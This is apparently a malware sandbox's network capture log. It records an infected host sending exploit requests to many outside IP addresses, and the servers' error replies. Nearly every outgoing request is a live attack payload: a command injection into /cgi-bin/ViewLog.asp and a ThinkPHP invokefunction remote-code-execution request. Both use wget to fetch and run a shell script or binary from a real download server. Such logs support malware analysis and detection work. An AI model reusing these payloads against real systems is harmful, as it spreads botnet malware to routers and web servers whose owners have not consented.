Feb 25, 2024 19:03:24.124898911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
367	192.168.2.15	55528	94.122.65.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:24.125113010 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
368	192.168.2.15	47460	95.169.74.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:24.186763048 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:24.438318014 CET	21	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
369	192.168.2.15	59080	95.101.232.57	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:24.197629929 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:24.456115007 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
Feb 25, 2024 19:03:24.507239103 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
Feb 25, 2024 19:03:24.606472969 CET	140	IN	HTTP/1.1 400 Bad Request Content-Length: 79 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
370	192.168.2.15	46568	94.122.204.126	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:24.279759884 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
371	192.168.2.15	49268	88.221.17.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:24.414046049 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:24.630572081 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:24 GMT Date: Sun, 25 Feb 2024 18:03:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 62 36 61 36 34 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 32 30 34 26 23 34 36 3b 64 38 33 39 31 38 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4b6a645f.1708884204.d83918d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
372	192.168.2.15	46536	85.122.198.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.303571939 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
373	192.168.2.15	46694	94.122.23.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.353574991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
374	192.168.2.15	60248	94.120.254.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.356959105 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
375	192.168.2.15	42180	94.154.87.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.412368059 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:26.853996992 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:27.134030104 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
376	192.168.2.15	42270	95.164.79.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.679584980 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:25.850748062 CET	1260	IN	HTTP/1.1 400 Bad Request Server: squid/4.10 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 18:03:25 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3543 X-Squid-Error: ERR_INVALID_URL 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from localhost X-Cache-Lookup: NONE from localhost:8080 Via: 1.1 localhost (squid/4.10) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans

Session ID	Source IP	Source Port	Destination IP	Destination Port
377	192.168.2.15	55306	95.100.57.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.846555948 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:26.060666084 CET	478	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Sun, 25 Feb 2024 18:03:25 GMT Date: Sun, 25 Feb 2024 18:03:25 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 37 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 30 35 26 23 34 36 3b 62 63 64 34 31 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.17161502.1708884205.bcd417</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
378	192.168.2.15	51054	31.136.110.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.860284090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:26.405972958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:27.525998116 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:29.765933037 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:34.373902082 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:43.333929062 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:01.509742975 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.373266935 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
379	192.168.2.15	41392	94.237.82.88	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.861776114 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:26.043895006 CET	291	IN	HTTP/1.1 404 Not Found Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io; Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 25 Feb 2024 18:03:25 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
380	192.168.2.15	41456	62.171.160.89	8080

Timestamp	Bytes transferred	Direction	Data
